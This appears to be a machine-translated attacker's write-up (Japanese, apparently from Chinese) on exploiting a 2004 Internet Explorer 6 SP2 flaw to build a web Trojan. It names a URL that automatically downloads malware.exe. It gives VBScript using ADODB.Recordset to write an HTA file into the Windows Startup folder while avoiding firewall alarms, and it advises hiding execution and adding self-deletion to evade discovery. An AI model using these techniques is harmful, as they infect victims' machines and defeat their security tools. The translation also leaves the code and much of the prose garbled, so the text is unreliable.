脆弱性の悪用:Microsoft Internet Explorer SP2のリモート任意のコマンド実行の脆弱性リリース日:2004-12-23影響を受けるシステム:Microsoft Internet Explorer 6.0 SP2 - Microsoft Windows XP Professional SP2 - Microsoft Windows XP Home SP2 Microsoft Internet Explorerには、ヘルプActiveXコントロールなどのさまざまな脆弱性が組み合わされています。リモートの攻撃者が任意のファイルを実行して悪意のあるコードを実行するためにユーザーの操作を必要とせずにこの脆弱性を悪用できます。 > Green League ice fox prodigal個人テストと分析公開されているテストページは英語版のwinxpシステム用なので、中国のシステムテストを使用する前に、まず次のディレクトリを作成する必要があります。C:\\ Documents and Settings \\ All Users \\ Start Menu \\ Programs \\ Startup \\テストに使用したテストページを使用して、ファイアウォールがインストールされている場合、alg.exeアプリケーションがネットワークにアクセスするように要求されることを確認しました。 Programs \\ Startup \\ディレクトリ自動的にhttp://freehost07.websamba.com/greyhats/malware.exeからダウンロードされ、美しい炎のデモを実行し、Cドライブを実行し、ファイル "Microsoft Office.hta"に書き込まれ、 "Microsoft Office.hta"を実行します。 [Microsoft Office.htaを実行してもファイアウォールにはアラームが表示されないことに注意してください!] writehta.txtのコードはリモートデータベースにアクセスすることで取得されたため、コードを確認し、ファイアウォールのアラームを検出しました。 Microsoft Office.htaのコードに、データベースにアクセスしないで直接htaコードをスクリプトに書き込めば、ファイアウォールのアラームを引き起こすことはできません!ハハの方法はADODB.Recordsetを呼び出すことです、使用されるコードは次のように書かれます。レコード、私は次のようにインターネット上のコードコードも見つかりました:エラー時次のセットevanchik = CreateObject( "ADODB.Recordset")evanchikで.FIElds.Append "evanchik"、200、 "3000" Call .Open Call .AddNew。 FIElds( "evanchik")。Value = "私がここに置かなければならなかったことを意味します" Call .AddNew .FIElds( "evanchik")。Value = "スタートアップディレクトリ「Call.Update End with evanchik.Save」C:\\ Documents and Settings \\ All Users \\スタートメニュー\\プログラム\\ Startup \\ Microsoft Office.htaに書き込まれる特定のコードを書いてください。adPersistXML evanchik.Closeファイアウォールの問題、次のステップは起動後のhtaファイルの操作を隠す方法を見ることです、私は特に書きません、今インターネット上で "no flashing web Trojan"と呼ばれているインターネット上の以前のオブジェクト脆弱性コードの使用を参照してください。に注意を払う必要がある、それは一度実行した後に簡単に見つけることはできませんので、自動削除機能を追加するのが最善です!さらに、この脆弱性によって作られたWebページのトロイの木馬はヘルプファイルを開きます。このセクションでは、Closeパラメータは自動的に閉じられます!この時点で、XPsp2 web Trojanは正常に完了しています!1.自動的に実行する方法が見つからなかったので、スタートアップフォルダに書き込むだけで、htaファイルの実行後はマシンの再起動を待ちます。トロイの木馬が実行されるためにダウンロードされることができないように、発見の後でクリアされることは容易2。あなたはローカルのhtmかchmファイルを呼びたいので、ファイルの許可を得るので、システムがCドライブにデフォルトでインストールされていない場合、ファイルに書き込むことはできません。